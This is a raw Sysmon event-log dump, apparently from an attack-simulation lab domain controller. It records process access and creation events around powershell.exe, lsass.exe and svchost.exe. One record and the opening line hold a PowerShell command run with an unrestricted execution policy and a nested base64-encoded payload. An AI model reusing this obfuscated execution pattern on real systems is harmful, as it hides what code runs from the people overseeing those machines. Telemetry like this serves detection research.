UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA= 10341000x80000000000000002901Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:57.677{733EE690-3DF7-5F80-0B00-000000007F01}868900C:\Windows\system32\lsass.exe{733EE690-3E39-5F80-8D00-000000007F01}4892C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002900Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:57.677{733EE690-3DF7-5F80-0B00-000000007F01}868900C:\Windows\system32\lsass.exe{733EE690-3E39-5F80-8D00-000000007F01}4892C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 11241100x80000000000000002899Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:57.646{733EE690-3E39-5F80-8D00-000000007F01}4892C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_x0qce5fi.zw0.ps12020-10-09 10:40:57.646 10341000x80000000000000002898Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:57.631{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E39-5F80-8D00-000000007F01}4892C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002897Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:57.615{733EE690-3E39-5F80-8B00-000000007F01}47484656C:\Windows\system32\conhost.exe{733EE690-3E39-5F80-8D00-000000007F01}4892C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002896Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:57.599{733EE690-3DF7-5F80-0B00-000000007F01}868900C:\Windows\system32\lsass.exe{733EE690-3DF9-5F80-1500-000000007F01}1356C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002895Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:57.599{733EE690-3DF7-5F80-0B00-000000007F01}868900C:\Windows\system32\lsass.exe{733EE690-3DF9-5F80-1500-000000007F01}1356C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002894Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:57.599{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002893Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:57.599{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002892Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:57.599{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002891Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:57.599{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002890Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:57.599{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002889Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:57.599{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002888Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:57.599{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002887Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:57.599{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002886Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:57.599{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002885Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:57.599{733EE690-3DF7-5F80-0500-000000007F01}644660C:\Windows\system32\csrss.exe{733EE690-3E39-5F80-8D00-000000007F01}4892C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000002884Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:57.599{733EE690-3E39-5F80-8C00-000000007F01}48804876C:\Windows\system32\cmd.exe{733EE690-3E39-5F80-8D00-000000007F01}4892C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000002883Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:57.613{733EE690-3E39-5F80-8D00-000000007F01}4892C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgB